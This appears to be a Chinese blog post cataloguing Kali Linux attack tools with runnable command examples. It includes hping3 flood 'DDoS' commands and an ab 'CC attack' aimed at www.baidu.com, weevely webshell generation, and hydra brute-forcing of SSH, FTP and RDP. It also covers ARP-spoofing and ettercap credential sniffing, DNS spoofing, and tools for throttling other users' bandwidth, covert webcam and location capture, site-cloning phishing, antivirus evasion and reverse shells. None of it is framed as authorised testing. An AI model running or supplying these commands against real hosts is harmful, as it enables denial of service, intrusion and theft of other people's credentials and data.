留言
这些工具我用的比较多,学习到的工具,我都会慢慢更新在这里,有些工具需要安装,说的不是太详细可以自行百度文章视频学习。
nikto
Nikto是一个开源的WEB扫描评估软件,可以对Web服务器进行多项安全测试,能在230多种服务器上扫描出,2600多种有潜在危险的文件、CGI及其他问题。
Nikto可以扫描指定主机的WEB类型、主机名、指定目录、特定CGI漏洞、返回主机允许的http模式等。
nikto -host http://www.example.comsteghide
Steghide是一款隐写术工具,用于在音频、图像、视频等文件中隐藏机密信息,并且可以加密隐藏的信息。它可以在文件中嵌入任意格式的数据,比如文本文件、图像、音频等等。
tcpdump
tcpdump是一个强大的网络数据包分析工具,它能够抓取网络上的数据包并将其分析。它可以用来诊断网络问题,分析网络安全问题,监测网络流量等,tcpdump可以运行在各种操作系统上,如Linux、Unix和Windows。
unshadow
unshadow 是一个 Unix 系统工具,用于将 /etc/passwd 和 /etc/shadow 文件合并为一个 John the Ripper 可读的文件,以便对系统的密码进行密码破解,该命令需要 root 权限,因为需要读取系统上的 shadow 文件,而该文件只有 root 用户才有权限读取。
unshadow /etc/passwd /etc/shadow > passwords.txt这条命令会将 /etc/passwd 和 /etc/shadow 文件合并为一个文本文件(passwords.txt),可以使用 John the Ripper 工具对其进行密码破解。
rar2john
rar2john是John the Ripper的一个工具,用于将RAR文件的加密密码结构转换为适用于John the Ripper的格式,通过这样做,您可以使用John the Ripper破解加密的RAR文件,以获取存储在其中的数据。
rar2john file > 1.txt // 导出hash
john 1.txt // 开始爆破hashab
ab 是web上的压力测试工具,可以实现cc攻击。
-n:在测试会话中所执行的请求个数。默认时,仅执行一个请求。
-c:一次产生的请求个数。默认是一次一个。
ab -c 10000 -n 1000 http://www.baidu.com/hping3
hping命令是一个基于命令行的TCP/IP工具,它在UNIX上得到很好的应用,不过它并非仅仅一个ICMP请求/响应工具,它还支持TCP、UDP、ICMP、RAW-IP协议,以及一个路由模型HPING一直被用作安全工具,可以用来测试网络及主机的安全。
// syn flood 伪造随机源地址,时间间隔1000us
hping3 -I eth1 -S 192.168.180.133 -p 80 --rand-source -i u1000
// tcp flood
hping3 -SARUPF -p 80 --flood --rand-source 192.168.180.133
// udp flood
hping3 --udp 192.168.180.133 -p 80 --rand-source --flood
// icmp flood
hping3 --icmp 192.168.180.133 --rand-source --flood
// dns flood
hping3 --udp 192.168.180.133 -p 53 --rand-source --flood
// 数据包跟踪
hping3 --traceroute -V -1 www.qq.com
// 多端口扫描
hping3 -I eth1 -8 1-1024 192.168.180.133macof
macof可以造成交换机mac泛洪,受到攻击之后,内部的CAM表很快就会被填满了,交换机退化成集线器,会将收到的数据包全部广播出去,从而无法正常地向局域网提供转发功能。
-i interface 指定要发送的接口
-s src 指定源IP地址
-d dst 指定目标IP地址
-e tha 指定目标硬件地址
-x sport 指定TCP源端口
-y dport 指定TCP目标端口
-n times 指定要发送的数据包数macof // 开始攻击fping
fping是一个小型命令行工具,用于向网络主机发送ICMP ( Internet控制消息协议 )回应请求,类似于ping,但在ping多个主机时性能要高得多。 fping完全不同于ping,因为您可以在命令行上定义任意数量的主机,或者指定包含要ping的IP地址或主机列表的文件。
-a 显示可ping通的目标
-A 将目标以ip地址的形式显示
-b <num> ping 数据包的大小。(默认为56)
-B <f> 设置指数反馈因子到f
-c <num> ping每个目标的次数 (默认为1)
-C <num> 同-c,返回的结果为冗长格式
-e 显示返回数据包所费时间
-f <file> 从文件获取目标列表( - 表示从标准输入)(不能与 -g 同时使用)
-g 通过指定开始和结束地址来生成目标列表(例如:fping –g 192.168.1.0 192.168.1.255)或者一个IP/掩码形式(例如:fping –g 192.168.1.0/24)
-i <num> 设置ip的TTL值 (生存时间)
-l 循环发送ping
-m ping目标主机的多个网口
-n 将目标以主机名或域名显示(等价于 -d )
-p <num> 对同一个目标的ping包间隔(毫秒) (在循环和统计模式中,默认为1000)
-q 安静模式(不显示每个目标或每个ping的结果)
-Q <num> 同-q, 但是每n秒显示信息概要
-r <num 当ping失败时,最大重试次数(默认为3次)
-s 打印最后的统计数据
-t <num> 单个目标的超时时间(毫秒)(默认500)
-u 显示不可到达的目标
-v 显示版本号fping -v // 显示版本
fping -g 192.168.60.1/24 // 范围扫描
fping -g -a 192.168.60.1/24 // 显示可以ping通的主机并写到文本arp-scan
arp-scan是Kali Linux自带的一款ARP扫描工具。
该工具可以进行单一目标扫描,也可以进行批量扫描。
批量扫描的时候,用户可以通过CIDR地址范围或者列表文件的方式指定。该工具允许用户定制ARP包,构建非标准数据包。
同时,该工具会自动解析Mac地址,给出MAC对应的硬件厂商,帮助用户确认目标。
什么是ARP协议
地址解析协议(Address Resolution Protocol),其基本功能为透过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的顺利进行。
它是IPv4中网络层必不可少的协议,是根据IP地址获得物理地址MAC的一个TCP/IP协议。通过ARP,在局域网可以很容易构成一个ARP欺骗,从而得到有用数据信息。
-f 从指定文件中读取主机名或地址
-l 从网络接口配置生成地址
-i 各扫描之间的时间差
-r 每个主机扫描次数
-V 显示程序版本并退出
-t 设置主机超时时间
-L 使用网络接口
-g 不显示重复的数据
-D 显示数据包往返时间arp-scan -l // 范围扫描
arp-scan -f ip.txt // ip范围扫描
arp-scan -l -i 1000 // 扫描之间的时间差
arp-scan -l -r 5 // 每个主机扫描次数
arp-scan -l -V // 显示程序版本并退出
arp-scan -t 1000 192.168.75.0/24 // 设置主机超时时间
arp-scan -L eth0 // 使用网络接口
arp-scan -l -g // 不显示重复的数据
arp-scan -l -D // 显示数据包往返时间 Weevely
生成和管理很难检测到的PHP木马,这是一个Web应用程序后开发的重要工。
可用于像一个隐藏的后门,作为一个有用的远程控制台更换管理网络帐户,即使托管在免费托管服务,类似于中国菜刀、蚂一剑等工具。
weevely generate 208522 webshell.php // 生成webshell
weevely http://192.168.80.131/webshell.php 208522 // 连接webshell :shell_su #通过更变使用者来执行shell命令,可以获得root权限来执行命令.
:shell_sh #执行 shell 命令.
:shell_php #执行 PHP 命令.
:system_extensions #收集PHP和webserver扩展列表
:system_info #收集系统信息
:system_procs #列出正在运行的进程
:audit_disablefunctionbypass #使用mod_cgi和.htaccess绕过系统禁用函数的限制。它会上传.htaccess和CGI脚本,并在远程服务器上运行伪系统shell
:audit_etcpasswd #查看/etc/passwd文件
:audit_suidsgid #查找带有SUID或SGID标志的文件。
:audit_phpconf #查看php配置信息
:audit_filesystem #审核文件系统的弱权限。枚举各种系统目录并寻找可读写执行的目录,模块仅默认搜索部分linux下的常见目录,logs、root、home等
:backdoor_reversetcp #执行反向TCP shell. 需要nc -lvp <port>监听
:backdoor_tcp # 在TCP端口上生成shell
:net_scan #TCP端口扫描.
:net_mail #发送邮件.
:net_ifconfig #获取网络接口地址.
:net_curl #执行类似curl的HTTP请求.
:net_proxy #运行本地代理以通过目标转移HTTP / HTTPS浏览
:net_phpproxy #在目标上安装PHP代理.
:bruteforce_sql #可用来猜解数据库密码.
:file_find #查找具有给定名称和属性的文件.
:file_download #从远程文件系统下载文件.
:file_check #获取文件的属性和权限.
:file_touch #更改文件时间戳.
:file_cd #更改当前工作目录.
:file_grep #打印与多个文件中的模式匹配的行.
:file_gzip #压缩或解压gzip文件.
:file_tar #压缩或解压tar文件.
:file_enum #检查路径列表的存在和权限
:file_bzip2 #压缩或解压bzip2文件.
:file_mount #使用HTTPfs挂载远程文件系统.
:file_clearlog #从文件中删除字符串.
:file_zip #压缩或解压zip文件.
:file_cp #复制单个文件.
:file_upload2web #自动将文件上传到Web文件夹并获取相应的URL.
:file_edit #在本地编辑器上编辑远程文件.
:file_read #从远程文件系统中读取远程文件.
:file_webdownload #指定URL下载文件.
:file_upload #文件上载到远程文件系统.
:file_ls #列出目录内容.
:file_rm #删除远程文件.
:sql_dump #Multi dbms mysqldump replacement.
:sql_console #执行SQL查询或运行sql控制台.netcat
NetCat号称网络工具中的瑞士军刀,可以用它来做很多有用事情,比如侦听端口、端口扫描、传输文件、网络测速等等。
1.侦听模式/传输模式
2.Telnet/获取banner信息
3.传输文本信息
4.传输文件/目录
5.加密传输文件
6.远程控制/木马
7.加密所有流量
8.流媒体服务器
9.远程克隆硬盘
nc -lp 444 // 监听模式
nc -nv 192.168.60.121 444 // 连接ip进行通信
nc -nv 192.168.60.121 | ls -l // 远程执行命令
-v 详细输出
-l 监听模式,用于入站连接
-n 指定数字的IP地址,不能用hostname
-p port 本地端口号
-q 在stdin的EOF之后退出并延迟秒
-z 将输入输出关掉--用于扫描时
wirshark
Wireshark是网络数据包分析软件,可以探测指定网卡收到的数据包,并尽可能的分析这些数据包的协议、数据等资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换,wirshark是图形化操作软件
// 过滤规则
ip.src addr==192.168.0.208 or ip.src addr eq 192.168.0.208 // 显示来源IP
ip.dst addr==192.168.0.208 or ip.dst addr eq 192.168.0.208 // 显示目标IP
tcp.port eq 80 // 不管端口是来源的还是目标的都显示
tcp.port == 80 // 过滤80端口
tcp.port eq 2722
tcp.port eq 80 or udp.port eq 80
tcp.dstport == 80 // 只显tcp协议的目标端口80
tcp.srcport == 80 // 只显tcp协议的来源端口80
tcp.port >= 1 and tcp.port <= 80 // 过滤端口范围
// 工具能使用的协议有
TCP、udp、arp、icmp、http、smtp
ftp、dns、msnms、ip、ssl、等等。
udp.length == 26 // 这个长度是指udp本身固定长度8加上udp下面那块数据包之和
tcp.len >= 7 // 指的是ip数据包(tcp下面那块数据),不包括tcp本身
ip.len == 94 // 除了以太网头固定长度14,其它都算是ip.len,即从ip本身到最后
frame.len == 119 // 整个数据包长度,从eth开始到最后nmap
Nmap,Linux下的网络扫描和嗅探工具包,一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统。简单而言,这就是一个工具,用来检测目标主机是否开启,其操作系统是什么,有那些端口是开启的,是否可以扫描到目标主机存在漏洞等等,从而制定渗透的计划。
Nmap的探测结果以列表的形式展现,同时分为四个状态:open、closed、filtered(被过滤的)、unfiltered。
open:该端口开放;
closed:该端口关闭的;
filtered:发出的探测数据包不能到达目标主机的目标端口;
unfiltered:该端口可以被访问,但具体不清楚是开放的还是关闭的。
nmap 192.168.60.1 // 最基础的使用
nmap 192.168.60.1 -vv // 查看其详细信息
namp -p 1-60 192.168.60.1 // 扫描指定端口
nmap -sP 192.168.60.1 // ping扫描
nmap --traceroute 192.168.60.1 // nmap路由追踪
nmap --scan-delay 10s 192.168.60.1 // 每次延迟10秒后再发送数据包,防止大量的扫描记录引起对方的防护。
nmap -Pn 192.168.60.1 // 跳过主机扫描,在扫描防火墙时很有必要。
nmap -iL 1.txt // 扫描文本里面所有的IP
nmap -sS -T4 192.168.60.1 // syn 扫描
nmap -sF -T4 192.168.60.1 // fin 扫描
nmap -sA -T4 192.168.60.1 // ack扫描
nmap --script=auth 192.168.60.1 // 弱口令扫描
nmap --script=vuln 192.168.60.1 // 扫描常见漏洞
nmap --script=ftp-brute.nse 192.168.60.1 //扫描弱口令账号,但是所用字典很小
nmap -p 80 --script=http-enum.nse 192.168.60.1 //扫描WEB敏感目录hydra
hydra 是一款世界顶级密码暴力破解工具,支持几乎所有的协议的在线破解,功能强大,其密码能否被破解关键取决于破解字典的是否足够强大,在网络安全渗透过程中是一款必备的测试工具。
目前该工具支持以下协议的爆破:
AFP,Cisco AAA,Cisco身份验证,Cisco启用,CVS,Firebird,FTP,HTTP-FORM-GET,HTTP-FORM-POST,HTTP-GET,HTTP-HEAD,HTTP-PROXY,HTTPS-FORM- GET,HTTPS-FORM-POST,HTTPS-GET,HTTPS-HEAD,HTTP-Proxy,ICQ,IMAP,IRC,LDAP,MS-SQL,MYSQL,NCP,NNTP,Oracle Listener,Oracle SID,Oracle,PC-Anywhere,PCNFS,POP3,POSTGRES,RDP,Rexec,Rlogin,Rsh,SAP / R3,SIP,SMB,SMTP,SMTP枚举,SNMP,SOCKS5,SSH(v1和v2),Subversion,Teamspeak(TS2),Telnet,VMware-Auth ,VNC和XMPP,使用xhydra可以打开图形界面。
-R:继续从上一次进度接着破解
-S:大写,采用SSL链接
-s <PORT>:小写,可通过这个参数指定非默认端口
-l <LOGIN>:指定破解的用户,对特定用户破解
-L <FILE>:指定用户名字典
-p <PASS>:小写,指定密码破解,少用,一般是采用密码字典
-P <FILE>:大写,指定密码字典
-e <ns>:可选选项,n:空密码试探,s:使用指定用户和密码试探
-C <FILE>:使用冒号分割格式,例如“登录名:密码”来代替 -L/-P 参数
-M <FILE>:指定目标列表文件一行一条
-t 指定多线程数,默认为16个线程
-o <FILE>:指定结果输出文件
-f :在使用-M参数以后,找到第一对登录名或者密码的时候中止破解
-t <TASKS>:同时运行的线程数,默认为16
-w <TIME>:设置最大超时的时间,单位秒,默认是30s
-v / -V:显示详细过程
server:目标ip// 爆破SSH:
hydra -L user.txt -P passwd.txt -o ssh.txt -vV -t 10 192.168.43.94 ssh
// -L指定用户字典 -P 指定密码字典 -o把成功的输出到ssh.txt文件 -vV显示详细信息 -t 指定线程数
// 爆破FTP
hydra -L user.txt -P passwd.txt -o ftp.txt -t 5 -vV 192.168.43.94 ftp
// -L指定用户名列表 -P指定密码字典 -o把爆破的输出到文件 -t指定线程 -vV 显示详细信息
// 爆破telnet
hydra 192.168.43.34 -L user.txt -P passwd.txt -t 10 telnet
// 爆破3389
hydra 192.168.43.34 rdp -L user.txt -P passwd.txt -Vdirb
dirb 是一个基于命令行的工具,可以根据单词列表对任何目录进行暴力破解。
它会发出一个 HTTP 请求,并查看每个请求的 HTTP 响应代码。
-a 设置ua
-c 设置cookie带cookie扫描
-N 忽略某些响应码
-o 输出结果
-p 使用代理
-X 在每个测试目录上附加后缀
-z 设置毫秒延迟dirb http://www.baidu.com // 正常扫描
dirb http://www.baidu.com 1.txt // 带用户字典
dirb http://www.baidu.com 1.txt -a "ua" -c "cookie" // 设置 ua 和 cookie
dirb http://www.baidu.com 1.txt -p ip:port -o result.txt // 使用代理和输出结果
dirb http://www.baidu.com 1.txt -z 1000 // 设置毫秒延迟arpspoof
arpspoof 是一款进行arp欺骗的工具,攻击者可以通过它来毒化受害者arp缓存,将网关mac替换为攻击者mac,然后攻击者可截获受害者发送和收到的数据包,可获取受害者账户、密码等相关敏感信息。ARP欺骗,是让目标主机的流量经过主机的网卡,再从网关出去,而网关也会把原本流入目标机的流量经过我得电脑。
工具使用非常简单
arpspoof -i eth0 -t 192.168.60.119 192.168.60.1 // 第一个ip是要攻击的主机 第二个ip是要伪装的ip可以填网关
arpspoof -i 网卡 -t 目标IP 网关
// 反向欺骗
arpspoof -i 网卡 -t 网关 目标IPettercap
开启流量转发就不会断网受害者的流量会经过攻击者的机器可以实现嗅探
echo 1 > /proc/sys/net/ipv4/ip_forward // 开启流量转发
ettercap -G // UI窗口化
ettercap -Tqi eth0 // 进行账号密码嗅探
ettercap -Tqi eth0 -M arp:remote /// /10.11.112.1// // 嗅探网关网页账号密码
ettercap -Tqi eth0 -M ARP // arp毒化eth0所在的网段,安静模式文本显示
ettercap -Tzq /10.0.0.1/21,22,23 -w hack.pcap // 监听10.0.0.1的ftp,ssh,telnet信息,并保存到本地
ettercap -Tq -P dns_spoof -M arp /192.168.1.120/ // 对192.168.1.120进行dns欺骗,使用默认网卡eth0文本模式安静显示
ettercap -Tqi eth0 -L sniffed_data -F filter.ef -M arp:remote /10.0.0.2/80 // 使用过滤并监听10.0.0.2在80端口的所有通信,安静模式文本显示,保存数据到本地
ettercap -Tqi eth0 -M ARP /ip// -w scan.logevillimiter

evillimiter这个工具可以直接限制别人的网速,这个项目在github上开源,感兴趣可以去看下是 Python3编写的程序。
Github地址: https://github.com/bitbrute/evillimiter
下载安装
直接 git clone https://github.com/bitbrute/evillimiter.git
下载到本地后解压,最好是用linux环境,运行需要Python3环境
执行 sudo Python setup.py install 来安装 # 按情况来
安装好,输入evillimiter进入就可以操作了。
┌──(root㉿kali)-[/home/kali/evillimiter]
└─# evillimiter // 进入
(Main) >>> scan // 扫描局域网主机
100% |██████████████████████████████| 256/256
OK 12 hosts discovered.
(Main) >>> hosts // 列出扫描结果
┌Hosts────────────────┬───────────────────┬──────────┬────────┐
│ ID │ IP address │ MAC address │ Hostname │ Status │
├────┼────────────────┼───────────────────┼──────────┼────────┤
│ 0 │ 192.168.60.1 │ 64:6e:97:39:fa:1c │ │ Free │
│ 1 │ 192.168.60.100 │ 90:e8:68:d4:ea:d9 │ │ Free │
│ 2 │ 192.168.60.102 │ 14:5a:fc:3e:52:ed │ │ Free │
│ 3 │ 192.168.60.103 │ 30:f7:72:26:90:11 │ │ Free │
│ 4 │ 192.168.60.104 │ a8:93:4a:2b:dc:87 │ │ Free │
│ 5 │ 192.168.60.105 │ a8:93:4a:89:9d:0d │ │ Free │
│ 6 │ 192.168.60.106 │ e8:d0:fc:c9:ab:27 │ │ Free │
│ 7 │ 192.168.60.107 │ 94:08:53:2f:17:41 │ │ Free │
│ 8 │ 192.168.60.111 │ 00:0c:29:77:cc:fb │ │ Free │
│ 9 │ 192.168.60.117 │ 00:0c:29:32:31:71 │ │ Free │
│ 10 │ 192.168.60.119 │ 04:d9:f5:5f:d3:e3 │ │ Free │
│ 11 │ 192.168.60.250 │ 80:18:44:ed:fc:7c │ │ Free │
└────┴────────────────┴───────────────────┴──────────┴────────┘
(Main) >>> limit 11 1kbit // 进行限速 1kbit 网速
OK 192.168.60.119 upload / download limited to 1kbit.
(Main) >>> free 7 // 解除限制
(Main) >>> quit // 退出
sqlmap
如果你正在寻找一个开源渗透测试工具。
sqlmap 是最好的之一。它可以自动化利用 SQL 注入漏洞的过程,并帮助你接管数据库服务器。
sqlmap.py -u url // 判断是否存在注入
sqlmap.py -u url --dbs // 查询当前用户的所有数据库
sqlmap.py -u url -D 数据库 --tables // 获取数据库中的表名
sqlmap.py -u url -D 数据库 -T 表名 --columns // 获取表中的字段名
sqlmap.py -u url -D 数据库 -T 表名 -C 字段 --dump // 获取字段内容
sqlmap.py -u url --users // 获取数据库所有的用户
sqlmap.py -u url --passwords // 获取数据库用户的密码
sqlmap.py -u url --curerent-db // 获取当前网站数据库名
sqlmap.py -u url --current-user // 获取当前网站数据库的用户名称
sqlmap.py -u url --is-dba // 当前用户是否为管理权限StormBreaker
无需任何权限即可获取设备信息
网址定位位置 [智能手机]
网络摄像头偷拍、网址录音
感兴趣可以去Github上看看
Github地址:https://github.com/ultrasecurity/Storm-Breaker

# Linux 操作系统安装
git clone https://github.com/ultrasecurity/Storm-Breaker
cd Storm-Breaker
sudo bash install.sh
sudo python3 -m pip install -r requirements.txt
sudo python3 st.pymsfconsole
msfconsole是metasploit中的一个工具(kali自带工具)
msfconsole集成了很多漏洞的利用的脚本,并且使用起来很简单的网络安全工具
banner // 替换logo
search port:443 // 漏洞搜索
use // 指定模块
info // 查看模块信息
back // 返回上一级
show options // 查看参数
show targets // 模块可攻击目标的类型
run、explpit、run -j // 这三个都是执行
check // 检测是否存在漏洞
connect // 连接端口 类似nc
sessions // 可以查看运行的会话,一般在回去靶机权限时使用
sessions -i 会话号 // 可以进入运行的会话
getuid // 提权Yersinia
yersinia是OSI第2层的攻击的框架,支持生成树协议(STP),VLAN中继协议(VTP),动态中继协议(DTP),IEEE 802.1Q,IEEE 802.1X,思科发现协议(CDP),动态主机配置协议(DHCP)等
可以实现dhcp泛洪攻击、交换机欺骗、STP欺骗、ARP欺骗、DHCP欺骗(伪装成dhcp服务器)
h 帮助屏幕
x 选择并执行攻击
i 选择网卡
ENTER 关于选择项目的信息
v 查看数据包的16进制
d 加载协议默认值
e 编辑数据表字段
f 列出捕获文件
s 从协议保存数据包
S 保存-来自所有协议的数据包
L 从网络学习数据包
N 设置Mac欺骗开/关
l 列出正在运行的攻击
K 杀死所有正在运行的攻击
c 清除当前协议statc
C 清除所有协议状态
g 转到其他协议屏幕
ctrl-l 重绘屏幕
w 写入配置文件
a 关于这个工具
q 退出yersinia -G // 启动图形化界面
yersinia 协议 -interface 网卡-attack id // 命令行的方式hping3
// DDOS攻击 (分布式拒绝服务攻击)
// UDP ddos攻击:
hping3 -c 10000 -d 120 --udp -w 64 -p 80 --flood --rand-source www.baidu.com
1
// ICMP ddos攻击:
hping3 -c 10000 -d 120 --icmp -w 64 -p 80 --flood --rand-source www.baidu.com
1
// SYN ddos攻击:
hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source www.baidu.com
1
// ACK ddos攻击:
hping3 -c 10000 -d 120 -A -w 64 -p 80 --flood --rand-source www.baidu.com
// 端口扫描
hping3 -I eth0 -S 192.168.10.1 -p 80dnsspoof
dnsspoof是一个dns欺骗工具
我们使用locate dnsspoof.hosts找到这个文件
vi 编辑他如下 对应映射会跳转到别胡网站:
10.10.10.3 .baidu.com
10.10.10.3 .google.com.hk
echo 1 >> /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 10.10.10.2 10.10.10.254
arpspoof -i eth0 -t 10.10.10.254 10.10.10.2
// 过滤规则
dnsspoof -i eth0 -f dnsspoof.hosts host 10.10.10.2 and udp port 53dnsspoof的原理如下:
由于DNS协议使用是传输层协议是UDP协议, 这样无需像TCP那样建立连接就可以轻松的伪造应答包,包括源IP. 10.10.10.2发送DNS 查询包问DNS服务器www.baidu.com的IP地址是多少? 10.10.10.1装作DNS服务器(伪造IP)向攻击目标发送一个DNS响应包说www.baidu.com的IP地址是10.10.10.3。
ipdrone
通过ip返回经纬度一些信息可实现定位,只能定位到市类似你在百度上搜,
ip返回的运营商大概的位置,需要python环境里面没什么厉害的代码,就是调了个api接口实现的。

Github: https://github.com/noob-hackers/ipdrone
python ipdrone.py -v 127.0.0.1 // 示例 setoolkit
功能有很多自己研究吧,一般常用克隆网站,骗取输入账号密码。

Aircrack-ng
暴力破解WIFI密码的工具,前提需要独立的无线网卡一块,没有其实也是有办法的。
httrack
爬取网页文件的工具,也就是爬虫工具,在终端输入httrack安装下就行。
burpsuite
burp Suite 是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP 消息,持久性,认证,代理,日志,警报的一个强大的可扩展的框架。
beef
漏洞分为存储型、反射型、DOM型,最常见的就是利用XSS漏洞弹窗,进一步获取用户Cookie信息。可是如今的WEB系统,有的已经设置HttpOnly属性,有的在请求头中使用Authorization字段提供token令牌,这导致了我们难以获取到用户的身份信息。在这个背景下,XSS漏洞好像越来越没用了。
BeEF-XSS是一款非常强大的XSS平台,集成了许多payload,利用它可以极大的提高XSS漏洞的威力。
binwalk
binwalk是kali系统中下的文件分析工具。
主要是用于CTF_杂项的隐写题,分离提取隐写的文件。
如:从图片里分离出压缩包,从流量分析文件里分离出图片,压缩包等。

binwalk filepath // 分析文件
binwalk -e filepath // 提取文件volatility
volatility常用于以下镜像文件的取证:raw、vmen、dmp、img,工具需要自行下载。
git clone https://github.com/volatilityfoundation/volatility.git
xsser
xsser是一款用于web端自动挖掘和利用xss漏洞的工具,功能非常强大。
xsser #命令行启动
xsser –gtk #GUI界面
xsser -u "http://xxx.xxx.xxx/" # 指定 URLpompem
Pompem的开源工具,该工具可以在当前最热门或最重要的漏洞数据库中搜索漏洞以及相应的漏洞利用代码。该工具采用Python开发,可以帮助渗透测试人员或白帽黑客快速完成漏洞审计任务。

# 输入一些网站的框架就可以搜索相关的漏洞
pompem -s Wordpress
pompem -s Joomla --html
pompem -s "Internet Explorer,joomla,wordpress" --html
pompem -s FortiGate --txt
pompem -s ssh,ftp,mysqldirsearch
dirsearch是一个基于python的高级命令行工具, 旨在对web服务器中的目录和文件进行暴力破解。它和我们平时使用的dirb、御剑等工具一样,就是为了扫描网站的敏感文件和目录从而找到突破口。

dirsearch -u http://www.xxx.comGithub: https://github.com/maurosoria/dirsearch
tplmap
Tplmap是一款自动检测和发掘服务器端模板注入漏洞的工具。支持测试Mako, Jinja2, Jade, Smarty, Freemarker, Velocity, 和Twig。

python3 tplmap.py -u http://4ed902ae-b677-45c3-a0c1-4c8a88af7f07.node3.buuoj.cn/qaq?name=1 --engine=Jinja2 --os-shell
Github: https://github.com/epinna/tplmap
koadic
在渗透测试过程中,小伙伴们通常会使用netcat、ncat进行反弹shell,但windows电脑通常不具备开箱即用这些命令的特点,故本期视频我们将分享一个工具koadic,它可以利用windows自带的mshta命令,进行反弹shell从而控制整台windows计算机。同时在关闭终端后依然可以维持会话,除此之外,koadic工具还提供了各种实用的小功能,大家可以自行使用。

git clone https://github.com/zerosum0x0/koadic.git
cd koadic
pip3 install -r requirements.txt
./koadicVeil
Veil Evasion,Veil Evasion是linux的一款免杀工具,是一个用 Python 编写的免杀框架,用来生成MSF的Payload,能绕过常见的杀毒软件,它可以将任意脚本或一段 Shellcode 转换成 Windows 可执行文件,从而逃避常见防病毒产品的检测。

wapiti
Wapiti是一款Web应用扫描工具,可以执行黑盒扫描,用户只需要输入要扫描的网址即可,该工具可以探测文件包含、数据库注入、XSS、CRLF、XXE注入、.htaccess绕过等漏洞,还可以指定报告文件格式等。

wpscan
WPScan是一个扫描 WordPress 漏洞的黑盒子扫描器,它可以为所有 Web 开发人员扫描 WordPress 漏洞并在他们开发前找到并解决问题,还使用了 Nikto,它是一款非常棒的Web 服务器评估工具,我们认为这个工具应该成为所有针对 WordPress网站进行的渗透测试的一部分。

radare2
Radare2是一个开源的命令行反汇编框架和逆向工程工具,支持多种架构和文件格式,可以用来对二进制文件进行静态和动态分析,包括反汇编、调试、数据可视化等操作等,跟IDA和x64dbg差不多,最主要的是kali自带,用起来感觉还可以。
r2 pwn
ROPgadget
ROPgadget 是一款强大的工具,专为在二进制文件中寻找Gadget而设计。它不仅是一个便捷的查找工具,也能自动化执行相关操作,极大地方便了研究人员在进行返回导向编程(ROP)攻击时的利用过程。ROPgadget 支持多种处理器架构,包括 x86、x64、ARM、PowerPC、SPARC 和 MIPS,同时兼容 ELF、PE 和 Mach-O 三种主流的文件格式。

评论 (0)